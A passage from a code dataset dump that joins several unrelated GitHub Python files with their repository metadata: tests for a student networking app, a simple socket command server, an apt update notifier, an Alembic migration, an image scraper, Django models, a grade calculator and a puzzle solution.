        8.) Go Back
        """
    # Not sure how to test the signup option
    # if options == 1:
    #     assert options == True
    if options == 2:
        assert options == "We're here to help"
    if options == 3:
        assert options == "InCollege: Welcome to InCollege, the world's largest college student network with many users in many countries and territories worldwide"
    if options == 4:
        assert options == "InCollege Pressroom: Stay on top of the latest news, updates, and reports"
    if options == 5:
        assert options == "Under Construction"
    if options == 6:
        assert options == "Under Construction"
    if options == 7:
        assert options == "Under Construction"
    if options == 8:
        assert options == False  # "Going back to 'Useful Links' Menu"
    if options == 2:
        assert options == "Under Construction"
    if options == 3:
        assert options == "Under Construction"
    if options == 4:
        assert options == "Under Construction"
    if options == 5:
        assert options == False
    # Tried to test automatic input for signup but tests kept failing, tried nested mocks but still failed
    # with mock.patch.object(builtins, 'input', lambda _: 1):
    #     assert print_useful_links()
    # with mock.patch.object(builtins, 'input', lambda _: '1'):
    #     assert print_useful_links()
    # with mock.patch.object(builtins, 'input', lambda _: 'Bernie'):
    #     assert print_useful_links()
    # with mock.patch.object(builtins, 'input', lambda _: 'Sanders'):
    #     assert print_useful_links()
    # with mock.patch.object(builtins, 'input', lambda _: 'Sandman'):
    #     assert print_useful_links()
    # with mock.patch.object(builtins, 'input', lambda _: "S@ndm@n69*"):
    #     assert print_useful_links()
    # with mock.patch.object(builtins, 'input', lambda _: '8'):
    #     assert print_useful_links()
    # with mock.patch.object(builtins, 'input', lambda _: '5'):
    #     assert print_useful_links() == False
def test_privacy_policy():
    """toggle_privacy on a fresh user leaves well-typed, in-range settings."""
    # empty the database
    with open("test_database.json", 'w+') as db:
        init_db = {
            "users": []
        }
        json.dump(init_db, db)
        db.close()
    fake_user = {"username": "newUser46", "password": "tahirMon@1",
                 "first_name": "John", "last_name": "Cena"}
    assert verify_register(fake_user["username"], fake_user["password"],
                           fake_user["first_name"], fake_user["last_name"], "test_database.json") == True
    # NOTE(review): bare expression — has no effect; presumably meant to
    # reference the module-level global set by login().
    LOGGED_IN_USER
    assert login(fake_user["username"],
                 fake_user["password"], "test_database.json") == True
    assert toggle_privacy(
        LOGGED_IN_USER["username"], "test_database.json") == True
    with open("test_database.json", "r") as db:
        data = json.load(db)
        for user in data["users"]:
            if user["username"] == LOGGED_IN_USER["username"]:
                assert isinstance(user["settings"]["email"], bool)
                assert isinstance(user["settings"]["sms"], bool)
                assert isinstance(user["settings"]["targeted_ads"], bool)
                assert isinstance(user["settings"]["language"], str)
                assert user["settings"]["email"] == False or user["settings"]["email"] == True
                assert user["settings"]["sms"] == False or user["settings"]["sms"] == True
                assert user["settings"]["targeted_ads"] == False or user["settings"]["targeted_ads"] == True
                assert user["settings"]["language"] == "English" or user["settings"]["language"] == "Spanish"
        db.close()
def test_upper_case_func():
    """upper_case must capitalize every word of a (partly) lowercase phrase."""
    cases = [
        ("Computer science", "Computer Science"),
        ("computer engineering", "Computer Engineering"),
        ("biology", "Biology"),
        ("chemical engineering", "Chemical Engineering"),
        ("fake major with five words", "Fake Major With Five Words"),
    ]
    for raw, expected in cases:
        assert upper_case(raw) == expected
def test_creating_profile():
    """Create a profile via post_title and verify the stored fields."""
    # Start from an empty database so only this test's user exists.
    with open("test_database.json", 'w+') as db:
        init_db = {
            "users": []
        }
        json.dump(init_db, db)
        db.close()
    profile_1 = {
        "title": "Senior",
        "major": upper_case("computer science"),
        "university": upper_case("university of south florida"),
        "about": "test friend",
        "experience": [
            {
                "title": "Customer relation director",
                "employer": "Burgerking",
                "date_started": "6/9/2006",
                "date_ended": "6/9/2009",
                "location": "Tampa",
                "description": "Handle and fulfill customer's request"
            }
        ],
        "education": [
            {
                "school": "USF",
                "degree": "Undergrad",
                "years_att": "2069"
            }
        ]
    }
    fake_user = {"username": "newUser46", "password": "tahirMon@1",
                 "first_name": "John", "last_name": "Cena"}
    assert verify_register(fake_user["username"], fake_user["password"],
                           fake_user["first_name"], fake_user["last_name"], "test_database.json") == True
    # NOTE(review): bare expression — has no effect.
    LOGGED_IN_USER
    assert login(fake_user["username"],
                 fake_user["password"], "test_database.json") == True
    assert post_title(profile_1["title"], profile_1["major"], profile_1["university"], profile_1["about"],
                      profile_1["experience"], profile_1["education"], "test_database.json")[0] == True
    with open("test_database.json", 'r') as db:
        data = json.load(db)
        for user in data["users"]:
            if user.get("posted_title"):  # Only verify is user has created a profile
                # Verify major is capitalized
                # NOTE(review): asserting a generator expression is always
                # truthy — these two checks never fail. Should be
                # all(x[0].isupper() for x in major) or similar.
                major = user["posted_title"]["major"].split()
                assert (x.isupper() for x in major)
                # Verify university is capatilized
                university = user["posted_title"]["university"].split()
                assert (x.isupper() for x in university)
                # Verify experience is more than 3
                experience_length = len(user["posted_title"]["experience"])
                assert experience_length >= 0 and experience_length <= 3
def test_profile_view():
    """Exercise viewing a user's profile and the friend-option menu.

    Resets ``test_database.json``, registers one user, displays that user and
    checks the menu selection returned by ``get_user_option``.
    NOTE(review): profile_1/profile_2 are built but never used — dead
    fixtures? fake_friend is also unused.
    """
    # Start from an empty test database.
    with open("test_database.json", 'w+') as db:
        init_db = {
            "users": []
        }
        json.dump(init_db, db)
        db.close()
    profile_1 = {
        "title": "Senior",
        "major": "Computer Science",
        "university": "USF",
        "about": "test 2",
        "experience": [
            {
                "title": "Customer relation director",
                "employer": "McDonald's",
                "date_started": "6/9/2006",
                "date_ended": "6/9/2009",
                "location": "Tampa",
                "description": "Handle and fulfill customer's request"
            }
        ],
        "education": [
            {
                "school": "USF",
                "degree": "Undergrad",
                "years_att": "2020"
            }
        ]
    }
    profile_2 = {
        "title": "Senior",
        "major": "Computer Science",
        "university": "USF",
        "about": "test 2",
        "experience": [
            {
                "title": "Customer relation director",
                "employer": "McDonald's",
                "date_started": "6/9/2006",
                "date_ended": "6/9/2009",
                "location": "Tampa",
                "description": "Handle and fulfill customer's request"
            }
        ],
        "education": [
            {
                "school": "USF",
                "degree": "Undergrad",
                "years_att": "2020"
            }
        ]
    }
    fake_user = {"username": "alexm", "password": "Alex123!",
                 "first_name": "Alex", "last_name": "Miller"}
    fake_friend = {"username": "ayman", "password": "Ayman123!",
                   "first_name": "Ayman", "last_name": "Nagi"}
    assert verify_register(fake_user["username"], fake_user["password"],
                           fake_user["first_name"], fake_user["last_name"], "test_database.json") == True
    # Render the user's profile and the friends menu (interactive helpers
    # from the application under test).
    display_user(fake_user["username"])
    friend_option()
    # get_user_option(1,2) presumably prompts for a choice in [1, 2] —
    # TODO confirm against its definition.
    options = get_user_option(1,2)
    if options == 1:
        print("No friends listed")
    if options == 2:
        # NOTE(review): asserting the value just compared is a tautology.
        assert options == 2
def test_friend_list():
    """Interactively list the logged-in user's friends and optionally remove
    one, keeping both sides of the friendship in sync in test_database.json.

    NOTE(review): this relies on the module-level LOGGED_IN_USER and a
    ``prompt`` helper from the application under test, and it re-reads input()
    — it is an interactive scenario rather than an automated assertion.
    """
    # Start from an empty test database.
    with open("test_database.json", 'w+') as db:
        init_db = {
            "users": []
        }
        json.dump(init_db, db)
        db.close()
    fake_user = {"username": "alexm", "password": "Alex123!",
                 "first_name": "Alex", "last_name": "Miller"}
    assert verify_register(fake_user["username"], fake_user["password"],
                           fake_user["first_name"], fake_user["last_name"], "test_database.json") == True
    # NOTE(review): 'str' shadows the builtin; it holds the logged-in username.
    str = ""
    print("You have already connected with:")
    with open('test_database.json') as db:
        data = json.load(db)
        for user in data["users"]:
            if user["username"] == LOGGED_IN_USER["username"]:
                str = LOGGED_IN_USER["username"]
                print('\n'.join(user["friends"]), )
                yes_no = prompt("Would you like to disconnect from any of your friends?(y/n): ")
                # NOTE(review): any non-empty answer (including "n") is truthy
                # here — confirm prompt()'s return value.
                if yes_no:
                    deleted_friend = input("Enter the name of the friend you want to delete from the list above: ")
                    if deleted_friend in user["friends"]:
                        # Remove the friend from the logged-in user's list.
                        user["friends"].remove(deleted_friend)
                        print(deleted_friend, "was deleted")
                        with open('test_database.json', 'w+') as db:
                            json.dump(data, db)
                        # And remove the logged-in user from the friend's list.
                        for user in data["users"]:
                            if user["username"] == deleted_friend:
                                user["friends"].remove(str)
                                with open('test_database.json', 'w+') as db:
                                    json.dump(data, db)
                    else:
                        print("The username you entered is not part of your friends.")
            else:
                # Stop scanning at the first non-matching user.
                break
def test_friend_search():
    """Interactive scenario: log in, search the user base by last name and
    send a friend request to a selected match.

    Returns True if a request was sent, False otherwise.
    NOTE(review): this reads the real ``database.json`` (not the test
    database used elsewhere) — confirm that is intended.
    """
    username = input("Please enter a username (type in 'alexm' for test): ")
    password = input("Please enter a password (type in 'Alexm123!' for test) : ")
    logged_in = login(username, password)
    friend = str(
        input("Search for people you know by last name, university, or thier major (type in last name 'Nagi' for test case): "))
    people_found = []
    found_friend = False
    # Search db for friend by last name, university, or major
    # NOTE(review): only last name is actually matched below.
    with open("database.json", 'r') as db:
        data = json.load(db)
        for user in data["users"]:
            # Never offer the logged-in user as their own friend.
            if user["username"] == LOGGED_IN_USER["username"]:
                continue
            if user["last_name"] == friend:
                people_found.append(user["username"])
                found_friend = True
    db.close()
    if found_friend:
        i = 1
        print("We found " + str(len(people_found)) +
              " person(s) that matched your search. Please select your friend:")
        print("0. Exit")
        # Print all people with matching results
        for name in people_found:
            print(str(i) + ". " + str(name))
            i += 1
        # Let user select friend to add and make pending request for friend
        selection = get_user_option(0, len(people_found))
        if selection == 0:  # If they select exit
            return False
        else:  # If selected a person to add
            # Menu is 1-based, list is 0-based.
            selection -= 1
            request_friend(people_found[selection], LOGGED_IN_USER["username"])
            print("You have successfully sent " +
                  str(people_found[selection]) + " a friend request.")
            return True
    else:
        print("Sorry we couldn't find your friend")
        return False
def test_del_job():
    """Drive the manage-jobs menu against ``test_database.json`` and assert
    the selected sub-action reports success.
    """
    # Start from an empty test database.
    with open("test_database.json", 'w+') as db:
        init_db = {
            "users": []
        }
        json.dump(init_db, db)
    # BUG FIX: the original called json.load(db) immediately after json.dump()
    # on the same w+ handle; the file pointer was at EOF so it always raised
    # JSONDecodeError — and its result was never used. The call was removed.
    fake_user = {"username": "alexm", "password": "Alex123!",
                 "first_name": "Alex", "last_name": "Miller"}
    assert verify_register(fake_user["username"], fake_user["password"],
                           fake_user["first_name"], fake_user["last_name"], "test_database.json") == True
    # BUG FIX: login used the literal "Alexm123!", which does not match the
    # password registered above, and omitted the test database. Use the
    # fake_user credentials and the same test database, as the other tests do.
    logged_in = login(fake_user["username"], fake_user["password"], "test_database.json")
    while True:
        time.sleep(1)
        print_manage_jobs()
        user_choice = get_user_option(1, 5)
        while user_choice < 1 or user_choice > 5:
            print("Invalid input. Try again")
            user_choice = get_user_option(1, 5)
        if user_choice == 1:  # Delete a job
            deleted = delete_job()
            assert deleted == True
            return True
        elif user_choice == 2:  # View saved jobs
            edit_saved = edit_saved_jobs()
            assert edit_saved == True
            return True
        elif user_choice == 3:  # View applied jobs
            printApplied = print_applied_jobs()
            assert printApplied == True
            return True
        elif user_choice == 4:  # View jobs not applied for
            notApplied = print_not_applied()
            assert notApplied == True
            return True
        else:
            break
| [
"noreply@github.com"
] | noreply@github.com |
10e6c2473d46f0395d61ceb53a829bd201bce125 | 53e59b27ddde86802e4c9ecca49e6aa9bd456c6c | /robot_server.py | 9a55f78053f7b3abafb854a53b59395fe7ce6671 | [] | no_license | kumarisurbhi/SIH_Hardware_2019 | 3e6c5f245dd4ffe26967f1c031922a69f06acbb4 | 9da13e60d1b08a269fe8ccef40821641efc46f84 | refs/heads/master | 2022-07-11T13:14:38.551897 | 2020-05-17T06:23:02 | 2020-05-17T06:23:02 | 196,074,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,158 | py | import socket
# '' binds to all available interfaces.
host = ''
port = 5560  # any higher-level (unprivileged, >1024) port
# Value returned to clients by the GET command.
storedValue = "Yo, what's up?"
def setupServer():
    """Create the listening TCP socket bound to the module-level (host, port).

    Returns the bound socket. Raises socket.error if the bind fails.
    """
    # socket.AF_* - address and protocol families (AF_INET = IPv4)
    # socket.SOCK_* - socket type (SOCK_STREAM = TCP)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print('socket created')
    try:
        s.bind((host,port))
    except socket.error as msg:
        # BUG FIX: the original printed the error, then fell through to print
        # 'socket bind complete' and returned an unbound socket, deferring the
        # failure to a confusing point later. Close and re-raise instead.
        print(msg)
        s.close()
        raise
    print('socket bind complete')
    return s
def setupConnection():
    """Block until a client connects and return the connected socket.

    Uses the module-level listening socket ``s``.
    """
    s.listen (1) # backlog of 1: one connection at a time;
    # for more than one, change here and use multithreading
    conn, address = s.accept()
    print('connected to : ' + address[0]+ ':' + str(address[1]))
    return conn
# ****** Commands in form of functions ******
def GET():
    """Return the server's stored value (module-level ``storedValue``)."""
    return storedValue
def REPEAT(dataMessage):
    """Echo the payload part of a parsed ['R', payload] message back."""
    return dataMessage[1]
# ****** end of commands ******
def dataTransfer(conn):
    """Serve one client connection until it sends EXIT or KILL.

    Protocol: each message is utf-8 text of the form "COMMAND info".
    Supported commands: GET (return storedValue), R (echo info back),
    EXIT (close this connection), KILL (shut the server down).
    """
    print('started dataTransfer')
    # Request/response loop: sends and receives until told to stop.
    while True:
        print('in loop')
        # Receive data with the specified buffer size, i.e. 1024 here.
        data = conn.recv(1024)
        # In Python 3 sockets carry bytes; this protocol uses utf-8 strings,
        # so decode on receive (and encode again on send below).
        data = data.decode('utf-8')
        # Split once on the first space: "command info" -> [command, info].
        dataMessage = data.split(' ', 1)
        command = dataMessage[0]
        reply = ''
        # Dispatch on the command word.
        if command == 'GET':
            reply = GET()
        elif command == 'R':
            # NOTE(review): 'R' with no argument would raise IndexError in
            # REPEAT (dataMessage[1]) — confirm intended.
            reply = REPEAT(dataMessage)
        # Prevent a crash when the client disconnects.
        elif command =='EXIT':
            print('client left')
            break
        elif command == 'KILL':
            # Shut down the whole server: closes the module-level listening
            # socket ``s`` before leaving this connection's loop.
            print('server is shutting down')
            s.close()
            break
        else:
            reply = 'Unknown command'
        # Send the reply back to the client (skipped on EXIT/KILL via break).
        print (reply)
        conn.send(str.encode(str(reply)))
        print('data has been sent')
    conn.close()
# Create the listening socket once, then accept clients one at a time.
s = setupServer()
while True:
    try:
        conn = setupConnection()
        print('dataTransfer')
        dataTransfer(conn)
        print('after dataTransfer')
    except Exception as e:
        # Narrowed from a bare 'except:' (which also swallowed
        # KeyboardInterrupt). Print what went wrong, then exit cleanly.
        print('exception mai aa gaya')
        print(e)
        break  # to prevent crash and exit if failed
    # BUG FIX: a trailing 'raise e' used to sit here. It executed after every
    # *successful* dataTransfer and raised NameError ('e' was never bound),
    # crashing the server as soon as the first client session ended. Removing
    # it lets the loop accept the next client (a KILL still ends the loop via
    # the exception path, since the listening socket is closed).
| [
"itsmesurbhi27@gmail.com"
] | itsmesurbhi27@gmail.com |
5a41960a55928dd63bb70c8a7008554e17a3496e | fa04e703556632fb6f513181070a496294b4f0dd | /patchnotifyer.py | e9804345e8e3f1936beb087a831e11a4efd27754 | [] | no_license | mhagander/patchnotifyer | a377d741c3837cbe6e5c8026ceced9a0a4b4c056 | 14c9b1d14780460645807227176db01aeef18267 | refs/heads/master | 2021-01-11T15:01:35.217795 | 2017-01-31T10:03:56 | 2017-01-31T10:03:56 | 80,282,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,583 | py | #!/usr/bin/env python3
import argparse
from io import StringIO
import socket
import smtplib
from email.mime.text import MIMEText
import apt_pkg
class _DevNullProgress(object):
# Need this class to make the apt output not go to the console
def update(self, percent = None):
pass
def done(self, item = None):
pass
def stop(self):
pass
def pulse(self, owner = None):
pass
def update_status(self, a, b, c, d):
pass
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Patch status notifyer")
    parser.add_argument('--fromaddr', type=str, help='From email address')
    parser.add_argument('--toaddr', type=str, help='To email address')
    parser.add_argument('--subject', type=str, help='Subject', default="Patch status on {0}".format(socket.gethostname()))
    # BUG FIX: the description string was passed as default= instead of help=,
    # so args.ignorepkg defaulted to that sentence and the later
    # 'pkg.name in args.ignorepkg' did substring matching against it.
    parser.add_argument('--ignorepkg', type=str, nargs='+', default=[], help='Ignore packages by exact name')
    args = parser.parse_args()

    # Mail is only sent when both addresses are configured.
    if args.fromaddr and not args.toaddr:
        parser.error("Can't specify from without to")
    if args.toaddr and not args.fromaddr:
        parser.error("Can't specify to without from")

    # Accumulates the report; a non-empty buffer at the end triggers output.
    status = StringIO()

    apt_pkg.init()
    # Turn off cache to avoid concurrency issues
    apt_pkg.config.set("Dir::Cache::pkgcache","")

    # "apt-get update"
    sl = apt_pkg.SourceList()
    sl.read_main_list()
    tmpcache = apt_pkg.Cache(_DevNullProgress())
    tmpcache.update(_DevNullProgress(), sl)

    # Now do the actual check (simulate a dist-upgrade and inspect the plan).
    cache = apt_pkg.Cache(_DevNullProgress())
    depcache = apt_pkg.DepCache(cache)
    depcache.read_pinfile()
    depcache.init()

    if depcache.broken_count > 0:
        status.write("Depcache broken count is {0}\n\n".format(depcache.broken_count))

    depcache.upgrade(True)
    if depcache.del_count > 0:
        status.write("Dist-upgrade generated {0} pending package removals!\n\n".format(depcache.del_count))

    for pkg in cache.packages:
        if depcache.marked_install(pkg) or depcache.marked_upgrade(pkg):
            if pkg.name in args.ignorepkg:
                continue
            status.write("Package {0} requires an update\n".format(pkg.name))

    # Anything written to the buffer means action is needed.
    if status.tell() > 0:
        if args.fromaddr:
            # Send email!
            msg = MIMEText(status.getvalue())
            msg['Subject'] = args.subject
            msg['From'] = args.fromaddr
            msg['To'] = args.toaddr
            s = smtplib.SMTP('localhost')
            s.send_message(msg)
            s.quit()
        else:
            print(status.getvalue())
| [
"magnus@hagander.net"
] | magnus@hagander.net |
71aeaf9ace671939684b2e376836428e91321100 | a72f501a945317646dfb3b1a049195994e63d69e | /migrations/versions/035ebdabfbca_.py | 413ed9f036cf63cbe5e3f1391a63e34ff0c54001 | [] | no_license | sseungyong/flask_pybo | bf49e11f3e5a70af751bf4a503476ccd6b2ba165 | fbdd37bccb1eea1c53938ff14a4ef757540f426e | refs/heads/master | 2023-01-01T21:51:52.998891 | 2020-10-13T17:07:17 | 2020-10-13T17:07:17 | 299,335,976 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py | """empty message
Revision ID: 035ebdabfbca
Revises: e2002a5ab9f7
Create Date: 2020-10-02 00:49:20.198940
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '035ebdabfbca'
# The migration this one applies on top of.
down_revision = 'e2002a5ab9f7'
branch_labels = None
depends_on = None
def upgrade():
    """Apply the migration: add answer.user_id (FK to user.id, CASCADE delete)."""
    # ### commands auto generated by Alembic - please adjust! ###
    # batch_alter_table recreates the table where needed (e.g. SQLite).
    with op.batch_alter_table('answer', schema=None) as batch_op:
        # server_default='1' backfills existing rows with user id 1.
        batch_op.add_column(sa.Column('user_id', sa.Integer(), server_default='1', nullable=True))
        # Deleting a user cascades to that user's answers.
        batch_op.create_foreign_key(batch_op.f('fk_answer_user_id_user'), 'user', ['user_id'], ['id'], ondelete='CASCADE')
    # ### end Alembic commands ###
def downgrade():
    """Revert the migration: drop the answer.user_id column and its FK."""
    # ### commands auto generated by Alembic - please adjust! ###
    with op.batch_alter_table('answer', schema=None) as batch_op:
        # Drop the constraint before the column it references.
        batch_op.drop_constraint(batch_op.f('fk_answer_user_id_user'), type_='foreignkey')
        batch_op.drop_column('user_id')
    # ### end Alembic commands ###
| [
"sseungyong@gmail.com"
] | sseungyong@gmail.com |
b210ba738591526df3bf05544638139ece6c18ee | 73e52b0411cb95aa1592aa3e1f9d86691d6e913c | /scraper.py | 63a5c1a3914afb5e553b2c90db57ce7587e958cc | [] | no_license | PandeKalyani95/Image-Scraper- | cae43e3b4057b9041bf67344a4cdcbd0029f61aa | 7bef3ad3ce5a153d70dade4f082d84d412c1db38 | refs/heads/master | 2023-01-15T23:25:38.271057 | 2020-11-26T11:11:20 | 2020-11-26T11:11:20 | 316,202,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,513 | py | import os
import time
import requests
from selenium import webdriver
def fetch_image_urls(query: str, max_links_to_fetch: int, wd: webdriver, sleep_between_interactions: int = 1):
    """Collect up to ``max_links_to_fetch`` full-resolution image URLs from a
    Google Images search for ``query``, driving the given selenium webdriver.

    Returns a set of URL strings.
    """
    def scroll_to_end(wd):
        # Scroll to the bottom so Google lazy-loads more thumbnails.
        wd.execute_script("window.scrollTo(0, document.body.scrollHeight);")
        time.sleep(sleep_between_interactions)

    # build the google query and load the results page
    search_url = "https://www.google.com/search?safe=off&site=&tbm=isch&source=hp&q={q}&oq={q}&gs_l=img"
    wd.get(search_url.format(q=query))

    image_urls = set()
    results_start = 0
    while len(image_urls) < max_links_to_fetch:
        scroll_to_end(wd)

        # All thumbnails currently loaded on the page.
        thumbnail_results = wd.find_elements_by_css_selector("img.Q4LuWd")
        number_results = len(thumbnail_results)

        print(f"Found: {number_results} search results. Extracting links from {results_start}:{number_results}")

        for img in thumbnail_results[results_start:number_results]:
            # Click every thumbnail so we can read the real image behind it.
            try:
                img.click()
                time.sleep(sleep_between_interactions)
            except Exception:
                continue

            # Extract full-resolution image URLs revealed by the click.
            for actual_image in wd.find_elements_by_css_selector('img.n3VNCb'):
                src = actual_image.get_attribute('src')
                if src and 'http' in src:
                    image_urls.add(src)

            if len(image_urls) >= max_links_to_fetch:
                break

        if len(image_urls) >= max_links_to_fetch:
            print(f"Found: {len(image_urls)} image links, done!")
            break

        # BUG FIX: the original had 'time.sleep(30); return' here inside the
        # per-thumbnail loop, which returned None (not the collected URLs)
        # after the first unfinished thumbnail and made the load-more logic
        # below unreachable dead code.
        print("Found:", len(image_urls), "image links, looking for more ...")
        load_more_button = wd.find_element_by_css_selector(".mye4qd")
        if load_more_button:
            wd.execute_script("document.querySelector('.mye4qd').click();")

        # Move the result start point past the thumbnails already processed.
        results_start = len(thumbnail_results)
    return image_urls
def persist_image(folder_path: str, url: str, counter):
    """Download ``url`` and save it as jpg_<counter>.jpg inside ``folder_path``.

    Errors are reported to stdout; nothing is raised to the caller.
    """
    try:
        image_content = requests.get(url).content
    except Exception as e:
        print(f"ERROR - Could not download {url} - {e}")
        # BUG FIX: the original fell through after a failed download and then
        # raised NameError on the unbound 'image_content' below.
        return

    try:
        file_path = os.path.join(folder_path, 'jpg' + "_" + str(counter) + ".jpg")
        # 'with' guarantees the file is closed even if the write fails.
        with open(file_path, 'wb') as f:
            f.write(image_content)
        print(f"SUCCESS - saved {url} - as {folder_path}")
    except Exception as e:
        print(f"ERROR - Could not save {url} - {e}")
def search_and_download(search_term: str, driver_path: str, target_path='./images', number_images=10):
    """Search Google Images for ``search_term`` and download the results into
    <target_path>/<search_term_with_underscores>/."""
    folder_name = '_'.join(search_term.lower().split(' '))
    # os.path.join picks the right separator for the operating system.
    target_folder = os.path.join(target_path, folder_name)

    if not os.path.exists(target_folder):
        os.makedirs(target_folder)

    with webdriver.Chrome(executable_path=driver_path) as wd:
        urls = fetch_image_urls(search_term, number_images, wd=wd, sleep_between_interactions=0.5)
        for index, url in enumerate(urls):
            persist_image(target_folder, url, index)
# pip install -r requirements.txt
# My Chrome version: 85.0.4183.102
# My Firefox version: 80.0.1 (64-bit)
# How to execute this code
# Step 1 : pip install selenium, pillow, requests
# Step 2 : make sure you have Chrome/Firefox installed on your machine
# Step 3 : check your Chrome version (go to the three-dot menu, then Help, then About Google Chrome)
# Step 4 : download the matching chromedriver from " https://chromedriver.storage.googleapis.com/index.html "
#          (select the folder closest to your Chrome version;
#          for Windows download 'chromedriver_win32' and extract it once downloaded)
# Step 5 : put it inside the same folder as this code
# Chrome version: 86.0.4240.183 (Official Build) (64-bit)
DRIVER_PATH = './chromedriver.exe' # Windows chromedriver binary next to this script
search_term = 'minions' # anything you want to download images of
# Number of images to fetch; search_and_download defaults to 10 if omitted.
number_images = 5 # no. of images
search_and_download(search_term=search_term, driver_path=DRIVER_PATH, number_images = number_images)
"kalyanipande95@gmail.com"
] | kalyanipande95@gmail.com |
df88d230cbd15ec04bc1a6a72a97e0b4d0682ea6 | b7427b344463aa1f53b15d19d70612ba48fd127d | /ThE_HustleR_ThinG/hustlerApp/models.py | 193937979c8f05469ab292421ca04393624e45ed | [] | no_license | faisal-git/ThE-HustleR-ProjecT | a778b186f6e09f1e85c35046380d74e786530eb8 | 6dae2d602d0f2606c64206cb17bdea748d7c9146 | refs/heads/main | 2023-02-21T15:43:41.909611 | 2021-01-28T06:47:30 | 2021-01-28T06:47:30 | 333,650,126 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,445 | py | from django.db import models
from django.contrib.auth.models import User
class userProfile(models.Model):
    """Basic profile attached 1:1 to a Django auth User."""
    user=models.OneToOneField(User,null=True,on_delete=models.CASCADE)
    FirstName=models.CharField(max_length=50)
    FirstName: str
    LastName=models.CharField(max_length=50,null=True,blank=True)
    Age=models.IntegerField(blank=True,null=True)
    # Free-text fields; all optional.
    PurposeOfLife=models.CharField(max_length=100,blank=True,null=True)
    Hobbies=models.CharField(max_length=50,blank=True,null=True)
class volunteerProfile(models.Model):
    """Extended 1:1 profile for users acting as volunteers."""
    volunteer=models.OneToOneField(User,null=True,on_delete=models.CASCADE)
    FirstName=models.CharField(max_length=50)
    LastName=models.CharField(max_length=50,blank=True,null=True)
    # Falls back to a bundled placeholder avatar.
    Image=models.ImageField(default='volunteer.png',upload_to='volunteer_pics')
    Date_created=models.DateField(auto_now_add=True)
    Introduction=models.CharField(max_length=200,blank=True,null=True)
    Profession=models.CharField(max_length=50,blank=True,null=True)
    Experience=models.CharField(max_length=30,blank=True,null=True)
    PurposeOfLife=models.CharField(max_length=100,blank=True,null=True)
    Hobbies=models.CharField(max_length=50,blank=True,null=True)
    # BUG FIX: this was written as 'Phone:models.CharField(...)' — a bare
    # annotation that Django ignores, so no Phone column was ever created.
    # blank/null keep the corrected field backward-compatible with existing rows.
    Phone=models.CharField(max_length=15,blank=True,null=True)
    # When True, contact details are hidden from other users.
    HideContactDetail=models.BooleanField(default=True)
class newsReport(models.Model):
    """A user-submitted news article with moderation status and view count."""
    # Allowed (stored value, human label) pairs for the Tag field.
    # NOTE(review): 'carrier' looks like a typo for 'career' — changing it
    # would require a data migration, so it is only flagged here.
    tag_choice=(
        ('academics','academics'),
        ('sports','sports'),
        ('entertainment','entertainment'),
        ('carrier','carrier'),
        ('business','business'),
        ('other','other'),
    )
    Title=models.CharField(verbose_name='title here',max_length=200)
    Image=models.ImageField(default='good-news.jpg',upload_to='news_pics')
    Date_created=models.DateField(auto_now_add=True)
    Description=models.TextField(max_length=1000)
    Place=models.CharField(max_length=100)
    Tag=models.CharField(max_length=50,choices=tag_choice)
    # Presumably False = pending approval — TODO confirm against view code.
    Status=models.BooleanField(default=False)
    Views=models.IntegerField(default=0)
class newsLikes(models.Model):
    """Join table recording which users liked which news report."""
    news=models.ForeignKey(newsReport,on_delete=models.CASCADE)
    users=models.ForeignKey(User,on_delete=models.CASCADE)
class newsViews(models.Model):
    """Join table recording which users viewed which news report."""
    news=models.ForeignKey(newsReport,on_delete=models.CASCADE)
    users=models.ForeignKey(User,on_delete=models.CASCADE)
class newsDisLikes(models.Model):
    """Join table recording which users disliked which news report."""
    news=models.ForeignKey(newsReport,on_delete=models.CASCADE)
    users=models.ForeignKey(User,on_delete=models.CASCADE)
| [
"faisalkv1963@gmail.com"
] | faisalkv1963@gmail.com |
8a751dd3fdd8f7cad0fb5420727098f2afbf427a | db3177a2130e32f5d77cdba0fcfa68d51aefe465 | /Grade_Calculator/grade_calculatorV2.py | 2cf6fa0adc2adaa74b31f623cde46c2d3bb04a93 | [] | no_license | David-Papworth/python-examples | 9880d4792a11c6a43e241e2f445bf28bac0aeaa7 | 09687a9aec186f982d846880142431eb184ec0bb | refs/heads/master | 2023-04-12T10:23:15.335305 | 2021-05-05T16:19:57 | 2021-05-05T16:19:57 | 360,544,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | def grade():
maths = int(input('Enter your maths mark: '))
chemistry = int(input('Enter your chemistry mark: '))
physics = int(input('Enter your physics mark: '))
total_mark = maths + chemistry + physics
average_mark = total_mark / 3
if average_mark >= 70:
achieve = "You achieved a grade: A"
elif average_mark >= 60:
achieve = "You achieved a grade: B"
elif average_mark >= 50:
achieve = "You achieved a grade: C"
elif average_mark >= 40:
achieve = "You achieved a grade: D"
else:
achieve = "You have failed"
return f"{achieve}"
print(grade()) | [
"dpapworth@academytrainee.com"
] | dpapworth@academytrainee.com |
fe54ef4a2f8f30cf3007c63d2da81d1941a2a673 | 2b8724d84d09f6fd92dc758e3bff7c38e5630ff6 | /puzzle6.py | 26a79673e3f5745c0566a2d6f3960394bcf127cc | [
"BSD-3-Clause"
] | permissive | apaku/aoc2017 | c8605d0dc299dfe6263c0e708537035c5b24e205 | 03c7fa468d571c02cd7f577e309de5fb39d97092 | refs/heads/master | 2021-03-24T12:01:32.240124 | 2017-12-28T10:59:04 | 2017-12-28T10:59:04 | 113,380,043 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,482 | py | import sys
def part1(numbers):
    """Advent of Code 2017 day 6, part 1.

    Repeatedly redistribute the largest memory bank (ties broken by lowest
    index) one block at a time to the following banks, and return the number
    of redistribution cycles performed until a configuration repeats.
    """
    blocks = list(numbers)
    # Set of previously seen configurations; tuple keys give O(1) membership
    # (the original kept a list of lists, making each check O(n) — quadratic
    # overall).
    seen = set()
    iterationcnt = 1
    while True:
        # Pick the first bank holding the maximum number of blocks.
        nextSplitIdx = blocks.index(max(blocks))
        banksize = blocks[nextSplitIdx]
        blocks[nextSplitIdx] = 0
        nextBlock = nextSplitIdx + 1
        # Deal the blocks out one at a time, wrapping around the end.
        while banksize > 0:
